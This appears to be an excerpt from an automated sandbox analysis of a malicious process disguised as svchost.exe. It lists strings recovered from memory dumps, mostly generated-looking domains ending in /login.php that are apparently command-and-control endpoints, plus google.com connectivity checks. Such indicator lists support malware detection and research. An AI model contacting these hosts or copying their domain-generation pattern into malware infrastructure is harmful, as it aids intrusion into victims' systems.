    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqef.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825305853.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502330096.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php3
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837121931.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybyc.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1762578913.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771305974.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2659316703.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1770660444.0000000007204000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636915993.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1762012054.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2640990048.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowydef.com/login.php
    Source: svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590376804.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowydet.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyjak.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykaf.com/login.php
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykaf.com/login.phpg
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymom.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822377847.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypek.com/login.php
    Source: svchost.exe, 00000001.00000003.2205979151.000000000BE8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2200645395.000000000BE88000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2703474342.000000000BEF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypit.com/H
    Source: svchost.exe, 00000001.00000003.2205979151.000000000BE8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypit.com/http://vowypit.com/H
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2761882286.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2206110408.0000000007253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2202437243.000000000724F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2205792310.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767998292.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762328713.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypit.com/login.php
    Source: svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqik.com/login.php
    Source: svchost.exe, 00000001.00000003.2562078765.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556795254.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqyt.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrec.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrif.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763330105.0000000005F1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762449108.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763511659.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrym.com/
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502438422.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771843831.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477371501.0000000007252000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2763215770.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrym.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2710338113.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2761882286.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736714375.0000000007235000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204802047.000000000721D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204593821.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767998292.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2762328713.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyzuk.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyzuk.com/login.php3
    Source: svchost.exe, 00000001.00000003.2497617085.00000000072D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1
    Source: svchost.exe, svchost.exe, 00000001.00000003.1801535191.000000000723B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2609151265.0000000005FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2707406247.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572741799.00000000072CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2529714728.0000000007259000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2628345613.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523427504.00000000072DD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2597912775.000000000725F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612043609.0000000005F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2498845453.000000000723D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761720600.0000000007238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572156160.0000000000875000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587501290.000000000BE77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854469401.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2499665960.00000000072D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801424463.000000000BE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2197134602.0000000007372000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572346079.000000000BECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
    Source: svchost.exe, 00000001.00000003.2532130451.0000000007271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2201173108.000000000BE38000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2628022342.0000000005FAD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2198718386.000000000BE38000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2834924586.000000000BE2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2842897316.000000000BE38000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2197565806.0000000007376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2625872454.0000000005FA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2703816156.0000000005FDC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586478071.0000000005FA1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2700566822.0000000005F39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2196382401.000000000BE45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2777910228.000000000BE50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526297762.000000000BE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2819909252.000000000087F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2553632319.000000000BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2618961435.0000000005F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2622914677.000000000087D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586480557.0000000005F9F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587501290.000000000BE68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
    Source: svchost.exe, 00000001.00000003.2833545159.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt.
    Source: svchost.exe, 00000001.00000003.2700566822.0000000005F24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577903308.0000000005F24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587501290.000000000BE63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtD
    Source: svchost.exe, 00000001.00000003.2842897316.000000000BE35000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2578168243.000000000BE75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477099031.000000000BE30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2847483677.000000000BE2D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534066537.000000000BE75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474986547.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2700566822.0000000005F35000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801424463.000000000BE35000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2476741902.000000000BE2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2789398526.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2626756220.000000000BE34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474225918.000000000BE75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2524875427.00000000072C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtT
    Source: svchost.exe, 00000001.00000003.2700566822.0000000005F24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2576774698.000000000BEE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570797195.0000000005F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534066537.000000000BE64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2778569184.0000000005F23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534743170.000000000BEE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtU
    Source: svchost.exe, 00000001.00000003.2526292973.000000000BE46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtm
